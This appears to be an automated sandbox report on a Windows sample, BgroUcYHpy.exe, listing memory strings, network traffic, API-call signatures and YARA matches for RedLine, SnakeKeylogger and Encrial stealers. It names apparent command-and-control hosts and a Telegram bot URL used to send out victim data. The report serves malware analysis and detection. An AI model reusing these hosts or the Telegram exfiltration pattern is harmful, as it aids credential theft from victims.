Source: svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a
Source: svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000002.00000002.4484780955.000000000551B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.000000000550C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.000000000554C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: svchost.exe, 00000002.00000002.4484780955.000000000550C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en0
Source: svchost.exe, 00000002.00000002.4484780955.000000000551B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enl
Source: svchost.exe, 00000002.00000002.4484780955.0000000005516000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000002.00000002.4484780955.000000000545E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053EF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053EF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: svchost.exe, 00000002.00000002.4484780955.000000000545E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005419000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 00000002.00000002.4484780955.000000000554C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: svchost.exe, 00000002.00000002.4484780955.000000000554C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/l
Source: svchost.exe, 00000002.00000002.4484780955.0000000005547000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_002C4164

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_002C4164

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002C3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_002C3F66

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002B001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_002B001C

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002DCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_002DCABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.BgroUcYHpy.exe.1360000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4483603541.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.2057269694.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00253B3A
Source: BgroUcYHpy.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: BgroUcYHpy.exe, 00000000.00000000.2019846565.0000000000304000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_85f86e02-6
Source: BgroUcYHpy.exe, 00000000.00000000.2019846565.0000000000304000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_4b7539f2-b
Source: BgroUcYHpy.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_be93694b-3
Source: BgroUcYHpy.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_3c6207de-2

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002BA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_002BA1EF

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002A8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_002A8310

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002B51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_002B51BD

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0025E6A0	0_2_0025E6A0
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0027D975	0_2_0027D975
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0025FCE0	0_2_0025FCE0
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002721C5	0_2_002721C5
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002862D2	0_2_002862D2
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002D03DA	0_2_002D03DA
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0028242E	0_2_0028242E
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002725FA	0_2_002725FA
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002AE616	0_2_002AE616
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002666E1	0_2_002666E1
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0028878F	0_2_0028878F
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00268808	0_2_00268808
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00286844	0_2_00286844
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002D0857	0_2_002D0857
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002B8889	0_2_002B8889
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00286DB6	0_2_00286DB6
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00266F9E	0_2_00266F9E
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00263030	0_2_00263030
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00273187	0_2_00273187
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0027F1D9	0_2_0027F1D9
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00251287	0_2_00251287
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00271484	0_2_00271484
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00265520	0_2_00265520
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00277696	0_2_00277696
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00265760	0_2_00265760
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00271978	0_2_00271978
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00289AB5	0_2_00289AB5
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0027BDA6	0_2_0027BDA6
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00271D90	0_2_00271D90
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002D7DDB	0_2_002D7DDB
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0025DF00	0_2_0025DF00
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_00263FE0	0_2_00263FE0
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_0147EFE8	0_2_0147EFE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CD7B8	2_2_078CD7B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CA598	2_2_078CA598
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CD4EA	2_2_078CD4EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078C74E0	2_2_078C74E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CC4E0	2_2_078CC4E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CD20A	2_2_078CD20A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CCF30	2_2_078CCF30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078C6EE8	2_2_078C6EE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CEEE0	2_2_078CEEE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078C2EF8	2_2_078C2EF8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CCC58	2_2_078CCC58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CC980	2_2_078CC980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078C586F	2_2_078C586F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CC6A8	2_2_078CC6A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078C4311	2_2_078C4311
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CEED0	2_2_078CEED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078CFBA8	2_2_078CFBA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E9578	2_2_091E9578
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E2580	2_2_091E2580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E5048	2_2_091E5048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E9C48	2_2_091E9C48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091ECCD0	2_2_091ECCD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E0B30	2_2_091E0B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_091E17B0	2_2_091E17B0
